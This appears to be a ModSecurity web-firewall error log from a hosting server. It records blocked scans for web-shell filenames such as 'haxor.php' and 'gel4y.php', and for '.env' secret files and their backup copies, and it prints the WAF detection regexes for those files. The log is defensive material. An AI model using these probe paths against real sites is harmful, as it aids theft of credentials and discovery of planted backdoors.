[Tue May 26 13:12:39.085779 2026] [security2:error] [pid 496740:tid 496884] [client 108.136.131.13:55597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/config.php"] [unique_id "ahVO7-vOeft4ltnLrH48kAAAAA4"]
[Tue May 26 13:12:39.085876 2026] [security2:error] [pid 496740:tid 496881] [client 108.136.131.13:55592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/content.php"] [unique_id "ahVO7-vOeft4ltnLrH48kQAAAAs"]
[Tue May 26 13:12:39.093457 2026] [security2:error] [pid 496740:tid 496993] [client 108.136.131.13:55594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/d.php"] [unique_id "ahVO7-vOeft4ltnLrH48kwAAAHs"]
[Tue May 26 13:12:39.110637 2026] [security2:error] [pid 496740:tid 496916] [client 207.241.173.38:43846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env"] [unique_id "ahVO7-vOeft4ltnLrH48rQAAAC4"]
[Tue May 26 13:12:39.115988 2026] [security2:error] [pid 496740:tid 496909] [client 207.241.173.38:43874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/api/.env"] [unique_id "ahVO7-vOeft4ltnLrH48rgAAACc"]
[Tue May 26 13:12:39.117129 2026] [security2:error] [pid 496740:tid 496919] [client 207.241.173.38:43886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/backend/.env"] [unique_id "ahVO7-vOeft4ltnLrH48owAAADE"]
[Tue May 26 13:12:39.118708 2026] [security2:error] [pid 496740:tid 496969] [client 207.241.173.38:43858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/app/.env"] [unique_id "ahVO7-vOeft4ltnLrH48pQAAAGM"]
[Tue May 26 13:12:39.513922 2026] [security2:error] [pid 496740:tid 496927] [client 108.136.131.13:56315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/dropdown.php"] [unique_id "ahVO7-vOeft4ltnLrH48xQAAADk"]
[Tue May 26 13:12:39.516863 2026] [security2:error] [pid 496740:tid 496992] [client 108.136.131.13:56302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/docindex.php"] [unique_id "ahVO7-vOeft4ltnLrH48xwAAAHo"]
[Tue May 26 13:12:39.518322 2026] [security2:error] [pid 496740:tid 496970] [client 108.136.131.13:56296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/db.php"] [unique_id "ahVO7-vOeft4ltnLrH48yAAAAGQ"]
[Tue May 26 13:12:39.523394 2026] [security2:error] [pid 496740:tid 496892] [client 108.136.131.13:56300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/doc.php"] [unique_id "ahVO7-vOeft4ltnLrH48ygAAABY"]
[Tue May 26 13:12:39.527311 2026] [security2:error] [pid 496740:tid 496888] [client 108.136.131.13:56298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/dev.php"] [unique_id "ahVO7-vOeft4ltnLrH48ywAAABI"]
[Tue May 26 13:12:39.956902 2026] [security2:error] [pid 496740:tid 496944] [client 108.136.131.13:56768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/error.php"] [unique_id "ahVO7-vOeft4ltnLrH482gAAAEo"]
[Tue May 26 13:12:39.958963 2026] [security2:error] [pid 496740:tid 496958] [client 108.136.131.13:56764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/e.php"] [unique_id "ahVO7-vOeft4ltnLrH482wAAAFg"]
[Tue May 26 13:12:39.965350 2026] [security2:error] [pid 496740:tid 496932] [client 108.136.131.13:56772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/exploit.php"] [unique_id "ahVO7-vOeft4ltnLrH483AAAAD4"]
[Tue May 26 13:12:39.975030 2026] [security2:error] [pid 496740:tid 496987] [client 108.136.131.13:56766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/eagle.php"] [unique_id "ahVO7-vOeft4ltnLrH483gAAAHU"]
[Tue May 26 13:12:39.975280 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:56769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/evil.php"] [unique_id "ahVO7-vOeft4ltnLrH483wAAAHc"]
[Tue May 26 13:12:40.401100 2026] [security2:error] [pid 496740:tid 496962] [client 108.136.131.13:57064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fierza.php"] [unique_id "ahVO8OvOeft4ltnLrH487AAAAFw"]
[Tue May 26 13:12:40.404399 2026] [security2:error] [pid 496740:tid 496949] [client 108.136.131.13:57063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fg.php"] [unique_id "ahVO8OvOeft4ltnLrH487QAAAE8"]
[Tue May 26 13:12:40.411486 2026] [security2:error] [pid 496740:tid 496874] [client 108.136.131.13:57057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/f0x.php"] [unique_id "ahVO8OvOeft4ltnLrH487gAAAAQ"]
[Tue May 26 13:12:40.412844 2026] [security2:error] [pid 496740:tid 496953] [client 108.136.131.13:57077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/file.php"] [unique_id "ahVO8OvOeft4ltnLrH487wAAAFM"]
[Tue May 26 13:12:40.414558 2026] [security2:error] [pid 496740:tid 496950] [client 108.136.131.13:57080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/f.php"] [unique_id "ahVO8OvOeft4ltnLrH488AAAAFA"]
[Tue May 26 13:12:40.814103 2026] [autoindex:error] [pid 496740:tid 496988] [client 207.241.173.38:43996] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:12:40.843207 2026] [security2:error] [pid 496740:tid 496905] [client 108.136.131.13:57241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fm1.php"] [unique_id "ahVO8OvOeft4ltnLrH49CQAAACM"]
[Tue May 26 13:12:40.845371 2026] [security2:error] [pid 496740:tid 496894] [client 108.136.131.13:57240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fm.php"] [unique_id "ahVO8OvOeft4ltnLrH49CwAAABg"]
[Tue May 26 13:12:40.845755 2026] [security2:error] [pid 496740:tid 496948] [client 108.136.131.13:57238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/filemanager.php"] [unique_id "ahVO8OvOeft4ltnLrH49CgAAAE4"]
[Tue May 26 13:12:40.852832 2026] [security2:error] [pid 496740:tid 496993] [client 108.136.131.13:57246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/foxx.php"] [unique_id "ahVO8OvOeft4ltnLrH49DQAAAHs"]
[Tue May 26 13:12:40.863940 2026] [security2:error] [pid 496740:tid 496885] [client 108.136.131.13:57239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/flame.php"] [unique_id "ahVO8OvOeft4ltnLrH49DwAAAA8"]
[Tue May 26 13:12:40.999943 2026] [security2:error] [pid 496740:tid 496947] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO8OvOeft4ltnLrH48-QAAAE0"]
[Tue May 26 13:12:41.216638 2026] [security2:error] [pid 496740:tid 496944] [client 207.241.173.38:43996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.copy"] [unique_id "ahVO8evOeft4ltnLrH49HAAAAEo"]
[Tue May 26 13:12:41.293419 2026] [security2:error] [pid 496740:tid 496986] [client 108.136.131.13:57425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fw.php"] [unique_id "ahVO8evOeft4ltnLrH49IwAAAHQ"]
[Tue May 26 13:12:41.295879 2026] [security2:error] [pid 496740:tid 496893] [client 108.136.131.13:57441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/gel4y.php"] [unique_id "ahVO8evOeft4ltnLrH49JAAAABc"]
[Tue May 26 13:12:41.296326 2026] [security2:error] [pid 496740:tid 496996] [client 108.136.131.13:57429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fx.php"] [unique_id "ahVO8evOeft4ltnLrH49JQAAAH4"]
[Tue May 26 13:12:41.300288 2026] [security2:error] [pid 496740:tid 496985] [client 108.136.131.13:57436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/gecko.php"] [unique_id "ahVO8evOeft4ltnLrH49JgAAAHM"]
[Tue May 26 13:12:41.312885 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:57435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/g.php"] [unique_id "ahVO8evOeft4ltnLrH49JwAAAD0"]
[Tue May 26 13:12:41.719417 2026] [security2:error] [pid 496740:tid 496971] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVO7-vOeft4ltnLrH480QAAAGU"]
[Tue May 26 13:12:41.740955 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:57579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/h.php"] [unique_id "ahVO8evOeft4ltnLrH49OQAAAFo"]
[Tue May 26 13:12:41.747696 2026] [security2:error] [pid 496740:tid 496871] [client 108.136.131.13:57581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/hello.php"] [unique_id "ahVO8evOeft4ltnLrH49OgAAAAE"]
[Tue May 26 13:12:41.750043 2026] [security2:error] [pid 496740:tid 496939] [client 108.136.131.13:57578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/green.php"] [unique_id "ahVO8evOeft4ltnLrH49OwAAAEU"]
[Tue May 26 13:12:41.752151 2026] [security2:error] [pid 496740:tid 496956] [client 108.136.131.13:57580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/haxor.php"] [unique_id "ahVO8evOeft4ltnLrH49PAAAAFY"]
[Tue May 26 13:12:41.752515 2026] [security2:error] [pid 496740:tid 496990] [client 108.136.131.13:57573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/gelay.php"] [unique_id "ahVO8evOeft4ltnLrH49PQAAAHg"]
[Tue May 26 13:12:42.182744 2026] [security2:error] [pid 496740:tid 496936] [client 108.136.131.13:57926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/hi.php"] [unique_id "ahVO8uvOeft4ltnLrH49WAAAAEI"]
[Tue May 26 13:12:42.184033 2026] [security2:error] [pid 496740:tid 496968] [client 108.136.131.13:57970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/id.php"] [unique_id "ahVO8uvOeft4ltnLrH49WQAAAGI"]
[Tue May 26 13:12:42.188698 2026] [security2:error] [pid 496740:tid 496870] [client 108.136.131.13:57974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/idx.php"] [unique_id "ahVO8uvOeft4ltnLrH49WgAAAAA"]
[Tue May 26 13:12:42.191937 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:57984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/if.php"] [unique_id "ahVO8uvOeft4ltnLrH49WwAAACY"]
[Tue May 26 13:12:42.197339 2026] [security2:error] [pid 496740:tid 496966] [client 108.136.131.13:57949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/i.php"] [unique_id "ahVO8uvOeft4ltnLrH49XAAAAGA"]
[Tue May 26 13:12:42.404798 2026] [security2:error] [pid 496740:tid 496976] [client 207.241.173.38:44294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.swp"] [unique_id "ahVO8uvOeft4ltnLrH49ZgAAAGo"]
[Tue May 26 13:12:42.405903 2026] [security2:error] [pid 496740:tid 496934] [client 207.241.173.38:44310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.orig"] [unique_id "ahVO8uvOeft4ltnLrH49ZwAAAEA"]
[Tue May 26 13:12:42.406835 2026] [security2:error] [pid 496740:tid 496931] [client 207.241.173.38:44238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.copy"] [unique_id "ahVO8uvOeft4ltnLrH49aAAAAD0"]
[Tue May 26 13:12:42.407489 2026] [security2:error] [pid 496740:tid 496889] [client 207.241.173.38:44282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local~"] [unique_id "ahVO8uvOeft4ltnLrH49aQAAABM"]
[Tue May 26 13:12:42.411049 2026] [security2:error] [pid 496740:tid 496897] [client 207.241.173.38:44248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.bak"] [unique_id "ahVO8uvOeft4ltnLrH49awAAABs"]
[Tue May 26 13:12:42.413091 2026] [security2:error] [pid 496740:tid 496911] [client 207.241.173.38:44260] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.old"] [unique_id "ahVO8uvOeft4ltnLrH49bAAAACk"]
[Tue May 26 13:12:42.414715 2026] [security2:error] [pid 496740:tid 496938] [client 207.241.173.38:44222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.orig"] [unique_id "ahVO8uvOeft4ltnLrH49bQAAAEQ"]
[Tue May 26 13:12:42.415319 2026] [security2:error] [pid 496740:tid 496906] [client 207.241.173.38:44204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env~"] [unique_id "ahVO8uvOeft4ltnLrH49bgAAACQ"]
[Tue May 26 13:12:42.417671 2026] [security2:error] [pid 496740:tid 496918] [client 207.241.173.38:44166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.bak"] [unique_id "ahVO8uvOeft4ltnLrH49cAAAADA"]
[Tue May 26 13:12:42.418455 2026] [security2:error] [pid 496740:tid 496929] [client 207.241.173.38:44180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.old"] [unique_id "ahVO8uvOeft4ltnLrH49cQAAADs"]
